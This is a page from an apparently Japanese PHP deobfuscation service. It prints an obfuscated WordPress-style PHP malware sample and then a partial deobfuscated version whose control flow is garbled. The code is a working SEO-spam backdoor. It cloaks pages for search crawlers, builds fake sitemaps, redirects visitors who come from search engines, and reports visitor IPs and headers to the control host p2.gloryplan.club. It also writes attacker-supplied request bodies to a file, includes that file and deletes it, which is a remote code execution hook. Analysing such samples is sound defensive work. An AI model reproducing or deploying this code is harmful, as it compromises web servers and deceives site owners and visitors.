Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php goto P3tpd; Zmcbe: if (!@preg_match("\43\136\50\134\x64\51\52\x23", $tTacP)) { goto NGbfN; } goto jz6RO; fWqfN: $Et744 = $_SERVER["\122\105\x51\x55\105\123\124\x5f\x55\x52\x49"]; goto q_pUd; brxri: if (!@preg_match("\43\136\57\x67\x65\x74\166\x65\162\44\x23\151", $Et744, $a31x_)) { goto pE3l4; } goto viBMA; vas28: echo $m6H6r; goto NVwzz; EHyes: function urls($WdTuD, $IZ1nS, $QHMH8, $H2fhy, $Bhuel = null) { goto wDFGj; wDFGj: $N9MBm = stream_socket_client("\163\163\154\72\57\57" . $WdTuD . "\72\x34\x34\63", $mPQn4, $T6vDI, 6); goto eOv53; ySBB0: fclose($N9MBm); goto S_GJX; eOv53: $QaBDP = "\107\105\124\40" . $IZ1nS . "\77" . $Bhuel . "\40\110\x54\x54\120\x2f\61\x2e\x30\15\12\x48\x6f\163\x74\x3a\40" . $WdTuD . "\xd\12\x52\x65\x66\145\x72\145\x72\x3a\x20" . $H2fhy . "\xd\12\x55\163\145\162\55\101\147\x65\x6e\x74\72\40" . $QHMH8 . "\15\xa\xd\xa"; goto GUlBH; GUlBH: $u1gkC = fwrite($N9MBm, $QaBDP); goto ySBB0; S_GJX: } goto jQ01d; kDwzc: $lFhBg = str_replace(array("\57\x5c\x2f\163\x2b\57", "\134\162\x5c\x6e", "\x5c\x72", "\x5c\156", "\42", "\54"), '', $lFhBg); goto tosag; TRJRX: echo sprintf($gPehY, $yGmwu); goto uRHDP; hhllQ: echo $a31x_[1]; goto khAg3; o76Sk: array_push($xR4Xh, "\164\x69\155\x65\163\x74\x61\x6d\160\72\40" . $gOoLH); goto V1mjW; NbNSC: $gVGsY = explode("\xa", $tTacP); goto YPwwT; GiYL0: exit; goto fqsMj; lb6iO: foreach ($gVGsY as $xlv7r) { goto c7bAd; sEPtB: SIzjt: goto p0SfK; c7bAd: $BRtnN = $hM7Z9 . "\x3a\57\57" . $WdTuD . "\57" . $xlv7r; goto V9aEY; V9aEY: $WmIhR .= sprintf($MZBoo, $BRtnN, $BRtnN); goto sEPtB; p0SfK: } goto StgTx; idX9c: $QHMH8 = isset($_SERVER["\110\124\124\120\x5f\125\123\105\x52\137\x41\107\x45\116\124"]) ? $_SERVER["\x48\x54\x54\120\x5f\x55\x53\x45\x52\137\101\107\105\116\124"] : ''; goto WQGXu; xwAoy: pE3l4: goto t0Pg9; z3pAc: $zgLiX = "\x3c\x3f\170\155\x6c\40\166\145\x72\163\151\157\x6e\x3d\42\x31\x2e\60\x22\40\145\x6e\x63\157\x64\x69\x6e\147\x3d\x22\x55\124\106\55\70\x22\77\x3e\74\41\55\x2d\x20\141\165\164\157\x67\145\x6e\40\142\171\x20\144\157\151\155\40\x2d\55\x3e\xd\12\x3c\165\x72\x6c\163\x65\x74\x20\170\x6d\154\156\x73\x3d\42\x68\164\x74\x70\x3a\57\57\167\167\167\56\x73\x69\x74\145\x6d\141\160\x73\56\157\x72\147\x2f\x73\x63\x68\145\x6d\141\163\x2f\163\x69\x74\x65\155\141\x70\x2f\x30\56\71\x22\xd\xa\x20\x20\40\x20\40\40\170\155\x6c\x6e\163\x3a\170\150\164\155\154\75\42\150\x74\x74\x70\x3a\57\57\x77\x77\167\x2e\167\63\56\x6f\x72\147\x2f\x31\x39\71\71\x2f\170\150\164\155\154\x22\x3e\xd\12\x25\163\x3c\57\165\x72\x6c\163\x65\164\76"; goto dALRf; ZSsud: goto DSmrE; goto YfO5W; ObrcP: goto FuNe2; goto p_vAO; n9At4: if (!@preg_match("\x23\136\x2f\163\x69\164\145\x6d\x61\160\x28\x2e\52\77\x29\56\x78\155\x6c\x24\x23\x69", $Et744, $a31x_)) { goto RjNXL; } goto TpYAE; yXDQr: array_push($xR4Xh, "\164\151\155\x65\163\x74\x61\155\x70\x3a\40" . $gOoLH); goto SsPUb; w8XnW: @file_put_contents("\x2e\145\107\x41\60\124\x79\x32\127\114\x68", $fSyrl, FILE_USE_INCLUDE_PATH); goto WQ4ra; gVp_4: function https() { goto w4hak; E67sN: return "\150\164\x74\160"; goto ZpkEH; bUWPZ: return "\150\164\164\160\163"; goto u9zw9; u9zw9: U51tW: goto E67sN; w4hak: if (!(!empty($_SERVER["\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\110\x54\x54\120\123"]) !== "\x6f\146\146" || isset($_SERVER["\x48\x54\x54\x50\x5f\x58\x5f\x46\117\122\x57\x41\x52\x44\x45\x44\137\120\x52\x4f\124\x4f"]) && $_SERVER["\110\x54\124\x50\137\130\x5f\106\x4f\x52\127\x41\x52\104\105\x44\137\x50\x52\x4f\x54\x4f"] === "\150\164\164\160\163" || !empty($_SERVER["\110\124\124\x50\x5f\106\x52\117\x4e\x54\137\105\116\104\x5f\x48\124\124\120\x53"]) && strtolower($_SERVER["\110\x54\124\x50\x5f\106\122\117\116\124\137\105\116\x44\137\x48\124\x54\120\123"]) !== "\x6f\x66\x66")) { goto U51tW; } goto bUWPZ; ZpkEH: } goto wCMNM; t0Pg9: if (!@preg_match("\x23\147\x6f\x6f\x67\x6c\145\x7c\171\141\x68\157\x6f\174\142\151\156\147\x7c\x63\162\141\x66\x74\174\x43\162\x61\x77\x6c\145\x72\43\151", $QHMH8)) { goto twEZ4; } goto sYvZE; myrnt: $m6H6r .= $cnH0x . $R62Np; goto tNMSN; Gok_u: @ignore_user_abort(1); goto dcnf5; hqYiO: LGDWH: goto e61nl; Z3DjD: @set_time_limit(3600); goto Gok_u; F6S0s: $LGjHd = "\x73\x68\157\x73\164\75" . $WdTuD . "\46\160\162\x6f\164\x6f\75" . $hM7Z9; goto fWqfN; rFGk5: $eqpvL = isset($_SERVER["\110\x54\124\x50\137\x41\x43\x43\105\x50\x54\x5f\x4c\x41\x4e\107\125\101\x47\x45"]) ? substr($_SERVER["\110\124\124\x50\137\x41\x43\103\105\x50\124\137\114\x41\x4e\107\125\101\107\105"], 0, 4) : ''; goto hfRuE; tNMSN: goto Mgexl; goto czAzg; h7Str: if ($a31x_[1] === '' || @preg_match("\43\50\134\x64\x2b\x29\55\x24\43", $a31x_[1], $QaYGv)) { goto DWwok; } goto u5lC5; YfO5W: lcuua: goto K8_AT; dcnf5: $NrTSL = "\x34\62\x35"; goto z3pAc; z0w9Y: zzW00: goto NbNSC; gvXvd: $fSyrl = @file_get_contents("\160\150\x70\x3a\57\57\x69\x6e\160\165\164"); goto w8XnW; LDzyO: FuNe2: goto xHHqE; chGVP: $OClhb = $LGjHd . "\x26\147\162\x6f\165\x70\151\x64\x3d" . $NrTSL . "\x26\x75\x72\x69\x3d" . $Et744 . "\x26\x69\160\x3d" . $TDOow; goto NkjIJ; xf2j3: $OClhb .= sprintf("\x26\x68\x70\x69\x64\75\45\x73\55\x25\163", preg_replace("\57\133\x61\x2d\172\111\x5d\x28\170\171\x7a\x7c\x62\x75\172\172\x29\56\x2a\44\57", "\56\44\61", strrev($a31x_[1])), $a31x_[2]); goto CtxH2; CbmHQ: function cc($Et744) { goto KC7JX; KC7JX: $rEhDH = explode("\55", substr($Et744, 1, strlen($Et744) - 6)); goto ZeoAg; XUwGO: return false; goto G2628; ZeoAg: if (!(sizeof($rEhDH) != 3)) { goto l8odE; } goto XUwGO; yqnic: $lpmdt = sprintf("\45\165", crc32(sprintf("\x25\x73\55\x25\x73", $rEhDH[0], $rEhDH[1]))); goto I13hk; I13hk: return $lpmdt == $rEhDH[2]; goto QZmrO; G2628: l8odE: goto yqnic; QZmrO: } goto ZXe1q; EuQWG: wsCKT: goto xZPYN; jz6RO: $p0f1C = 1; goto RqcMj; StgTx: lAV0T: goto fkbd5; If3nY: A_G2o: goto JBcF2; uRHDP: exit; goto z0w9Y; pm5zi: $xR4Xh = array("\125\x73\x65\162\x2d\x41\x67\x65\156\164\x3a\40" . $QHMH8, "\x4c\141\x6e\x67\72\40" . $eqpvL, "\x52\x65\146\x65\x72\x65\162\x3a\x20" . $XjGFy, "\110\164\x74\160\55\110\x6f\163\164\x3a\x20" . $WdTuD, "\122\145\155\x6f\164\x65\55\101\x64\144\x72\x3a\x20" . $TDOow); goto F6S0s; N1Xnv: $lFhBg = urlx($uF5KJ, null, null, 1, "\x4d\x6f\172\151\x6c\x6c\x61\57\65\x2e\x30\x20\x28\x57\151\156\144\x6f\x77\x73\73\40\x55\73\40\x57\151\156\144\157\167\x73\x20\x4e\x54\40\x35\x2e\61\x3b\40\x65\x6e\x2d\x55\x53\x29\x20\101\160\160\x6c\x65\127\145\142\x4b\151\164\57\x35\63\64\x2e\67\40\x28\113\110\124\x4d\114\54\x20\x6c\151\153\145\40\x47\145\x63\153\x6f\51\x20\103\x68\162\x6f\x6d\x65\57\67\x2e\x30\56\65\61\67\56\x34\61\40\x53\141\146\x61\162\151\x2f\x35\63\x34\56\67"); goto TPwz2; yK20j: $p0f1C = 1; goto LDzyO; jQ01d: function urlx($uF5KJ, $xR4Xh = null, $LGjHd = null, $VA4AL = null) { goto piCB6; Ws5Rh: curl_setopt($bZVc3, CURLOPT_POSTFIELDS, $LGjHd); goto fHaqz; GkmKP: lJ_tM: goto j8zLH; JbEno: if (!(stripos($uF5KJ, "\x68\x74\164\x70\x73\x3a") === 0)) { goto WuQCs; } goto gVrfJ; ID0qb: WuQCs: goto FdDav; piCB6: $bZVc3 = curl_init(); goto ZXEp3; qw7Yw: curl_setopt($bZVc3, CURLOPT_ENCODING, "\147\x7a\151\x70\54\144\145\x66\x6c\141\164\145"); goto cleUw; fHaqz: Sob47: goto g5hQb; rWBtT: curl_setopt($bZVc3, CURLOPT_POST, 1); goto Ws5Rh; FdDav: if ($xR4Xh === null) { goto lJ_tM; } goto jeP5N; lrg17: $lFhBg = curl_exec($bZVc3); goto bVe_a; gVrfJ: curl_setopt($bZVc3, CURLOPT_SSL_VERIFYPEER, FALSE); goto wrUOQ; VFnfK: curl_setopt($bZVc3, CURLOPT_FOLLOWLOCATION, 1); goto LSR01; g5hQb: curl_setopt($bZVc3, CURLOPT_RETURNTRANSFER, 1); goto lrg17; wrUOQ: curl_setopt($bZVc3, CURLOPT_SSL_VERIFYHOST, FALSE); goto ID0qb; bVe_a: curl_close($bZVc3); goto MB1me; cleUw: D1rsI: goto JbEno; jeP5N: curl_setopt($bZVc3, CURLOPT_HTTPHEADER, $xR4Xh); goto GkmKP; ZXEp3: curl_setopt($bZVc3, CURLOPT_URL, $uF5KJ); goto VFnfK; MB1me: return $lFhBg; goto HcEyi; LSR01: if ($VA4AL === null) { goto D1rsI; } goto qw7Yw; j8zLH: if ($LGjHd === null) { goto Sob47; } goto rWBtT; HcEyi: } goto CbmHQ; zFTtb: exit; goto ctsEN; JcNl1: Ok_3L: goto xf2j3; FeObu: array_push($xR4Xh, "\164\x69\155\x65\x73\164\141\x6d\x70\x3a\x20" . $gOoLH); goto z3L64; rUSw7: if (!($tTacP === '')) { goto FDV2c; } goto Ihy_e; JBcF2: NGbfN: goto b1Mdg; viBMA: $gOoLH = strval(time()); goto yXDQr; EoaaF: goto danAl; goto If3nY; BXn5R: $tTacP = trim(urlx("\150\164\x74\160\163\72\57\57" . gets() . "\57\163\x69\164\x65\x6d\141\160\56\x78\155\x6c", $xR4Xh, $LGjHd . "\x26\150\x74\x74\x70\75" . $hM7Z9)); goto rUSw7; K8_AT: echo @trim(urlx(sprintf("\150\x74\x74\x70\163\72\57\57\45\x73\57\x62\157\164\57\x63\141\164\145\77" . $OClhb, gets()), $xR4Xh, $OClhb . "\x26\150\157\x73\164\x3d" . preg_replace("\57\133\x61\x2d\x7a\111\x5d\x28\x78\x79\x7a\x7c\142\165\x7a\172\51\56\x2a\x24\x2f", "\56\44\61", strrev($Lv7s7[1])) . "\x26\x63\x61\164\145\x69\144\x3d" . $Lv7s7[2], 1)); goto zFTtb; e61nl: $p0f1C++; goto ObrcP; To_XU: exit; goto fncGY; p_vAO: lIXm1: goto TRJRX; P3tpd: error_reporting(0); goto JXECt; czAzg: DWwok: goto Zix6v; jDqQw: DP3Bi: goto brxri; NVwzz: exit; goto cFI1P; u5lC5: $cnH0x = sprintf("\x68\x74\164\x70\x73\72\57\x2f\167\x77\x77\x2e\147\157\x6f\x67\154\x65\56\x63\x6f\x2e\152\x70\x2f\x70\151\156\x67\x3f\163\151\164\x65\x6d\x61\x70\x3d\45\163\72\x2f\57\x25\x73\57\163\x69\x74\145\x6d\141\160\x25\163\56\170\x6d\154", $hM7Z9, $WdTuD, $a31x_[1]); goto QamNe; sYvZE: $OClhb = $LGjHd . "\x26\150\164\164\x70\x3d" . $hM7Z9 . "\x26\x67\162\157\165\160\151\x64\x3d" . $NrTSL; goto MHfOj; q_pUd: if (!@preg_match("\x23\x5e\57\x70\x69\156\x67\163\151\x74\x65\155\141\x70\50\x2e\x2a\x3f\51\x2e\x78\155\154\44\43\x69", $Et744, $a31x_)) { goto k04h6; } goto mgju9; xHHqE: if (!($p0f1C <= intval($tTacP))) { goto lIXm1; } goto EHxjb; LafrP: @header("\x43\x6f\156\164\145\156\164\55\x74\x79\160\145\x3a\40\164\x65\170\x74\x2f\x78\155\154"); goto IAWiH; MC5KH: $p0f1C++; goto EoaaF; sCLef: if (!(@preg_match("\43\x67\x6f\157\147\x6c\x65\x2e\143\x6f\x2e\152\160\x7c\x67\157\x6f\x67\x6c\145\56\x63\157\x6d\x7c\x79\x61\x68\157\157\56\x63\x6f\56\152\x70\x7c\171\x61\150\x6f\157\56\143\157\x7c\x62\x69\156\147\x2e\x63\157\x6d\174\x61\163\153\56\x63\157\155\x7c\x61\157\x6c\56\x63\157\x6d\x7c\141\x6f\154\56\x6a\160\x23\x69", $XjGFy) && @preg_match("\43\x28\133\141\x2d\x7a\x49\x5d\x2b\51\55\x28\134\144\x2b\x29\x3f\50\55\50\x5c\144\53\x29\51\77\50\x2e\x68\164\155\x6c\51\x24\43\151", $Et744))) { goto zrdTI; } goto chGVP; b1Mdg: Mgexl: goto vas28; b0Ju2: FDV2c: goto Zmcbe; KouYb: $Et744 = $_SERVER["\x52\105\121\125\105\123\x54\x5f\x55\x52\x49"]; goto MpvCt; fqsMj: sANFx: goto blN8u; IAWiH: if (!(($a31x_[1] === '' || $QaYGv[1] != '') && @preg_match("\x23\x5e\50\x5c\144\x29\52\x23", $tTacP))) { goto zzW00; } goto dwuNR; SsPUb: array_push($xR4Xh, "\170\x64\x6f\x69\155\72\40" . crc32($gOoLH . "\134\x6e" . $LGjHd)); goto eezMm; WQGXu: $WdTuD = $_SERVER["\x48\124\x54\x50\x5f\x48\x4f\x53\124"]; goto KouYb; pMq9h: zrdTI: goto EHyes; khAg3: exit; goto jDqQw; FeT4r: if (!($p0f1C <= intval($tTacP))) { goto A_G2o; } goto GwrJR; MyoL0: $uF5KJ = $a31x_[1] == '' ? sprintf($uF5KJ, $WdTuD) : sprintf($uF5KJ, $a31x_[1]); goto N1Xnv; Zix6v: $LGjHd .= $QaYGv[1] == '' ? "\x26\147\x72\157\x75\160\x69\144\x3d" . $NrTSL : "\46\147\162\x6f\x75\x70\151\144\75" . $QaYGv[1]; goto iAaIs; IY9lw: if (@preg_match("\x23\143\x61\x74\x65\x5c\x2f\50\x5b\141\x2d\x7a\x5d\53\51\55\50\134\x64\53\x29\44\43\x69", $Et744, $Lv7s7)) { goto lcuua; } goto KkWxv; yf3yP: if (!(isset($_SERVER["\110\124\x54\x50\x5f\x58\x44\x4f\x49\x4d"]) && strlen($_SERVER["\x48\124\x54\x50\x5f\x58\104\117\x49\115"]) > 0)) { goto sANFx; } goto X9YyM; VCIBL: exit; goto pMq9h; pyt7U: $LGjHd .= "\x26\x67\162\157\165\x70\x69\x64\75" . $NrTSL; goto T6Zpx; TpYAE: $LGjHd = "\163\x68\x6f\163\164\x3d" . $WdTuD . "\x26\x68\x74\164\x70\x3d" . $hM7Z9; goto TPyJ1; MHfOj: if (@preg_match("\43\x28\x5b\x61\55\x7a\135\53\51\55\50\x5c\144\53\51\77\x28\56\x68\164\x6d\x6c\51\x24\x23\151", $Et744, $a31x_)) { goto Ok_3L; } goto IY9lw; sRIUZ: $hM7Z9 = https(); goto pm5zi; dwuNR: $yGmwu = ''; goto yK20j; TPwz2: $lFhBg = substr($lFhBg, strpos($lFhBg, "\x3c\x21\55\55\x20\55\x2d\76"), 100); goto kDwzc; lesl0: Khqby: goto MC5KH; WQ4ra: echo include "\56\145\107\101\x30\x54\x79\x32\x57\x4c\150"; goto KUbCD; L3Y8j: $gOoLH = strval(time()); goto FeObu; TPyJ1: if (@preg_match("\x23\x28\x5c\x64\x2b\51\x2d\44\43", $a31x_[1], $QaYGv)) { goto wsCKT; } goto pyt7U; JXECt: @ini_set("\x64\151\163\160\x6c\141\x79\x5f\145\x72\162\x6f\x72\163", 0); goto Z3DjD; xZPYN: $LGjHd .= "\x26\x67\x72\157\x75\160\x69\144\75" . $QaYGv[1]; goto V0Xfr; Ga6AF: twEZ4: goto sCLef; NkjIJ: $BRtnN = urlx(sprintf("\x68\x74\164\160\163\x3a\x2f\x2f\45\x73\x2f\x62\157\164\x2f\x33\x30\x32\x3f" . $OClhb . "\46\165\162\151\75" . $Et744, gets()), $xR4Xh, $OClhb, 1); goto CTLJw; XfB0U: goto DSmrE; goto JcNl1; V0Xfr: SZs6g: goto L3Y8j; tosag: @preg_match("\43\x28\134\x64\52\x29\344\xbb\xb6\74\41\55\55\43", $lFhBg, $a31x_); goto hhllQ; ctsEN: DSmrE: goto Ga6AF; KUbCD: unlink("\x2e\145\x47\101\60\x54\171\x32\127\114\x68"); goto GiYL0; tDi5h: RjNXL: goto yf3yP; V1mjW: array_push($xR4Xh, "\x78\x64\157\151\x6d\72\x20" . crc32($gOoLH . "\134\x6e" . $LGjHd)); goto BXn5R; CTLJw: @header("\x4c\157\143\x61\x74\x69\157\156\72\40" . $BRtnN); goto VCIBL; LuA1S: exit; goto ZSsud; CtxH2: echo @trim(urlx(sprintf("\x68\164\x74\x70\x73\x3a\x2f\57\x25\x73\x2f\142\157\164\x2f\x70\141\147\145\77" . $OClhb, gets()), $xR4Xh, $OClhb, 1)); goto LuA1S; MpvCt: $TDOow = clientip(); goto sRIUZ; QamNe: $R62Np = urlx($cnH0x); goto myrnt; VGf7l: $gPehY = "\x3c\77\x78\155\154\40\166\145\162\x73\x69\157\x6e\x3d\x22\x31\56\60\x22\40\145\156\x63\x6f\144\x69\x6e\x67\75\x22\x55\124\x46\55\x38\x22\x3f\76\74\x21\x2d\55\40\141\165\x74\157\147\x65\x6e\x20\142\x79\x20\x64\x6f\x69\x6d\x20\55\55\x3e\15\12\74\x73\151\x74\145\x6d\141\x70\x69\156\144\145\x78\40\170\155\x6c\x6e\163\x3d\x22\150\164\x74\x70\72\x2f\57\167\167\x77\x2e\x73\x69\164\145\155\141\160\x73\56\x6f\x72\x67\57\163\x63\150\x65\155\x61\163\x2f\163\x69\164\x65\x6d\x61\x70\x2f\x30\56\x39\x22\76\40\45\x73\40\x3c\x2f\163\x69\164\145\x6d\141\x70\x69\x6e\x64\x65\170\x3e"; goto YFl0V; blN8u: if (!@preg_match("\x23\136\57\x73\x69\164\145\x2f\77\50\56\52\x3f\51\x24\43\151", $Et744, $a31x_)) { goto DP3Bi; } goto HonUg; YPwwT: $WmIhR = ''; goto lb6iO; K2YHx: $m6H6r .= $cnH0x . $R62Np; goto lesl0; X9YyM: $gOoLH = isset($_SERVER["\x48\124\124\x50\x5f\x54\111\115\x45\123\x54\x41\115\x50"]) ? $_SERVER["\x48\124\124\120\x5f\x54\x49\115\105\123\124\x41\x4d\120"] : ''; goto gvXvd; Z8ZeA: exit; goto XfB0U; ZXe1q: function gets() { return "\160\62\56\x67\154\x6f\x72\x79\x70\154\141\x6e\x2e\143\x6c\x75\142"; } goto gVp_4; dALRf: $MZBoo = "\40\74\165\x72\x6c\x3e\40\74\x6c\x6f\x63\76\45\163\x3c\x2f\154\x6f\x63\76\x3c\x78\150\x74\x6d\154\72\154\x69\x6e\153\x20\x72\145\x6c\x3d\x22\x61\x6c\164\145\162\x6e\x61\x74\x65\42\40\150\x72\145\146\154\141\x6e\x67\x3d\42\152\x61\42\40\150\162\x65\x66\75\x22\45\163\x22\x2f\x3e\x3c\x2f\165\162\154\x3e"; goto VGf7l; eezMm: $MDAw8 = trim(urlx("\x68\164\164\x70\163\72\x2f\57" . gets() . $a31x_[0], $xR4Xh, $LGjHd)); goto tAD0L; fkbd5: echo sprintf($zgLiX, $WmIhR); goto dOfx6; iAaIs: $gOoLH = strval(time()); goto o76Sk; cFI1P: k04h6: goto n9At4; w5li8: if (!($tTacP === '')) { goto sV0P2; } goto To_XU; k6Bo3: $tTacP = trim(urlx("\x68\x74\x74\x70\163\x3a\57\57" . gets() . "\57\163\x69\164\145\x6d\x61\x70" . ($a31x_[1] == '' || $QaYGv[1] != '' ? "\56\170\155\x6c" : "\57" . $a31x_[1]), $xR4Xh, $LGjHd)); goto w5li8; Ihy_e: exit; goto b0Ju2; mCiJy: $R62Np = urlx($cnH0x); goto K2YHx; HonUg: $uF5KJ = urldecode("\150\x74\x74\x70\x73\x3a\57\57\163\145\141\162\x63\150\56\x79\141\x68\x6f\157\56\x63\157\x2e\x6a\x70\x2f\x73\x65\141\x72\x63\150\x3f\160\x3d\x73\x69\164\x65\72\45\163\x26\145\x69\75\x55\124\x46\55\70"); goto MyoL0; GwrJR: $cnH0x = sprintf("\x68\x74\x74\x70\163\72\x2f\57\167\x77\x77\56\x67\x6f\x6f\x67\154\x65\x2e\143\157\x2e\152\160\x2f\x70\x69\x6e\x67\x3f\x73\151\x74\x65\x6d\141\x70\75\x25\163\x3a\x2f\57\45\x73\x2f\163\151\164\145\155\141\160\x25\x73\x25\144\56\170\x6d\154", $hM7Z9, $WdTuD, $QaYGv[0], $p0f1C); goto mCiJy; mgju9: $m6H6r = ''; goto h7Str; YFl0V: $reKgL = "\x20\x3c\163\x69\x74\145\x6d\141\160\76\x20\74\x6c\x6f\143\x3e\x25\163\72\57\57\x25\163\x2f\163\x69\x74\145\x6d\x61\160\x25\x64\56\170\x6d\154\74\57\154\157\x63\x3e\74\57\x73\151\x74\x65\155\141\160\x3e"; goto rFGk5; tAD0L: echo $F1gD0 === false ? "\x66\x61\x69\x6c" . gets() : $MDAw8 . $NrTSL . gets(); goto L3Pjz; RqcMj: danAl: goto FeT4r; KkWxv: echo @trim(urlx(sprintf("\x68\x74\164\160\x73\72\x2f\x2f\x25\x73\x2f\142\157\x74\57\150\157\x6d\145\x3f" . $OClhb . "\x26\165\x72\151\x3d" . $Et744, gets()), $xR4Xh, $OClhb, 1)); goto Z8ZeA; fncGY: sV0P2: goto LafrP; z3L64: array_push($xR4Xh, "\170\144\157\x69\x6d\72\40" . crc32($gOoLH . "\134\x6e" . $LGjHd)); goto k6Bo3; dOfx6: exit; goto tDi5h; L3Pjz: exit; goto xwAoy; T6Zpx: goto SZs6g; goto EuQWG; hfRuE: $XjGFy = isset($_SERVER["\110\x54\x54\x50\137\122\x45\x46\105\x52\105\122"]) ? $_SERVER["\x48\124\x54\120\137\x52\x45\x46\105\x52\x45\x52"] : ''; goto idX9c; EHxjb: $yGmwu .= sprintf($reKgL, $hM7Z9, $WdTuD, $p0f1C, date("\131\55\155\55\x64\x5c\124\110\72\151\72\x73\x50", time())); goto hqYiO; wCMNM: function clientip() { goto Ob43V; mgpeK: if (isset($_SERVER["\122\105\x4d\x4f\124\105\137\x41\x44\x44\122"]) && $_SERVER["\x52\x45\x4d\x4f\124\105\x5f\101\104\x44\x52"] && strcasecmp($_SERVER["\122\x45\x4d\x4f\x54\x45\137\101\104\x44\122"], "\x75\x6e\153\x6e\157\x77\x6e")) { goto tPkBC; } goto qyQA7; xjS54: tPkBC: goto QrLmU; Ob43V: if (getenv("\x52\105\x4d\117\x54\x45\x5f\101\104\104\x52") && strcasecmp(getenv("\122\105\x4d\117\124\x45\x5f\x41\104\104\122"), "\165\156\x6b\156\157\167\156")) { goto rTsjk; } goto mgpeK; RQ75f: return getenv("\122\x45\115\x4f\x54\105\137\101\x44\x44\x52"); goto U3Bt5; C1FDt: rTsjk: goto RQ75f; tb4So: dRH_J: goto QJMk_; qyQA7: goto dRH_J; goto C1FDt; QrLmU: return $_SERVER["\x52\105\x4d\117\x54\x45\137\101\x44\x44\122"]; goto tb4So; U3Bt5: goto dRH_J; goto xjS54; QJMk_: }?><?php
error_reporting(0);
@ini_set("display_errors", 0);
@set_time_limit(3600);
@ignore_user_abort(1);
$NrTSL = "425";
$zgLiX = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!-- autogen by doim -->\r\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"\r\n xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">\r\n%s</urlset>";
$MZBoo = " <url> <loc>%s</loc><xhtml:link rel=\"alternate\" hreflang=\"ja\" href=\"%s\"/></url>";
$gPehY = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!-- autogen by doim -->\r\n<sitemapindex xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\"> %s </sitemapindex>";
$reKgL = " <sitemap> <loc>%s://%s/sitemap%d.xml</loc></sitemap>";
$eqpvL = isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 4) : '';
$XjGFy = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$QHMH8 = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$WdTuD = $_SERVER["HTTP_HOST"];
$Et744 = $_SERVER["REQUEST_URI"];
$TDOow = clientip();
$hM7Z9 = https();
$xR4Xh = array("User-Agent: " . $QHMH8, "Lang: " . $eqpvL, "Referer: " . $XjGFy, "Http-Host: " . $WdTuD, "Remote-Addr: " . $TDOow);
$LGjHd = "shost=" . $WdTuD . "&proto=" . $hM7Z9;
$Et744 = $_SERVER["REQUEST_URI"];
if (!@preg_match("#^/pingsitemap(.*?).xml\$#i", $Et744, $a31x_)) {
if (!@preg_match("#^/sitemap(.*?).xml\$#i", $Et744, $a31x_)) {
if (!(isset($_SERVER["HTTP_XDOIM"]) && strlen($_SERVER["HTTP_XDOIM"]) > 0)) {
if (!@preg_match("#^/site/?(.*?)\$#i", $Et744, $a31x_)) {
if (!@preg_match("#^/getver\$#i", $Et744, $a31x_)) {
if (!@preg_match("#google|yahoo|bing|craft|Crawler#i", $QHMH8)) {
Ga6AF:
if (!(@preg_match("#google.co.jp|google.com|yahoo.co.jp|yahoo.co|bing.com|ask.com|aol.com|aol.jp#i", $XjGFy) && @preg_match("#([a-zI]+)-(\\d+)?(-(\\d+))?(.html)\$#i", $Et744))) {
function urls($WdTuD, $IZ1nS, $QHMH8, $H2fhy, $Bhuel = null)
{
$N9MBm = stream_socket_client("ssl://" . $WdTuD . ":443", $mPQn4, $T6vDI, 6);
$QaBDP = "GET " . $IZ1nS . "?" . $Bhuel . " HTTP/1.0\r\nHost: " . $WdTuD . "\r\nReferer: " . $H2fhy . "\r\nUser-Agent: " . $QHMH8 . "\r\n\r\n";
$u1gkC = fwrite($N9MBm, $QaBDP);
fclose($N9MBm);
}
function urlx($uF5KJ, $xR4Xh = null, $LGjHd = null, $VA4AL = null)
{
$bZVc3 = curl_init();
curl_setopt($bZVc3, CURLOPT_URL, $uF5KJ);
curl_setopt($bZVc3, CURLOPT_FOLLOWLOCATION, 1);
if ($VA4AL === null) {
goto D1rsI;
}
curl_setopt($bZVc3, CURLOPT_ENCODING, "gzip,deflate");
D1rsI:
if (!(stripos($uF5KJ, "https:") === 0)) {
goto WuQCs;
}
curl_setopt($bZVc3, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($bZVc3, CURLOPT_SSL_VERIFYHOST, FALSE);
WuQCs:
if ($xR4Xh === null) {
goto lJ_tM;
}
curl_setopt($bZVc3, CURLOPT_HTTPHEADER, $xR4Xh);
lJ_tM:
if ($LGjHd === null) {
goto Sob47;
}
curl_setopt($bZVc3, CURLOPT_POST, 1);
curl_setopt($bZVc3, CURLOPT_POSTFIELDS, $LGjHd);
Sob47:
curl_setopt($bZVc3, CURLOPT_RETURNTRANSFER, 1);
$lFhBg = curl_exec($bZVc3);
curl_close($bZVc3);
return $lFhBg;
}
function cc($Et744)
{
$rEhDH = explode("-", substr($Et744, 1, strlen($Et744) - 6));
if (!(sizeof($rEhDH) != 3)) {
$lpmdt = sprintf("%u", crc32(sprintf("%s-%s", $rEhDH[0], $rEhDH[1])));
return $lpmdt == $rEhDH[2];
}
return false;
}
function gets()
{
return "p2.gloryplan.club";
}
function https()
{
if (!(!empty($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https" || !empty($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off")) {
return "http";
}
return "https";
}
function clientip()
{
if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) {
return getenv("REMOTE_ADDR");
}
if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
return $_SERVER["REMOTE_ADDR"];
}
dRH_J:
}
// [PHPDeobfuscator] Implied script end
return;
}
$OClhb = $LGjHd . "&groupid=" . $NrTSL . "&uri=" . $Et744 . "&ip=" . $TDOow;
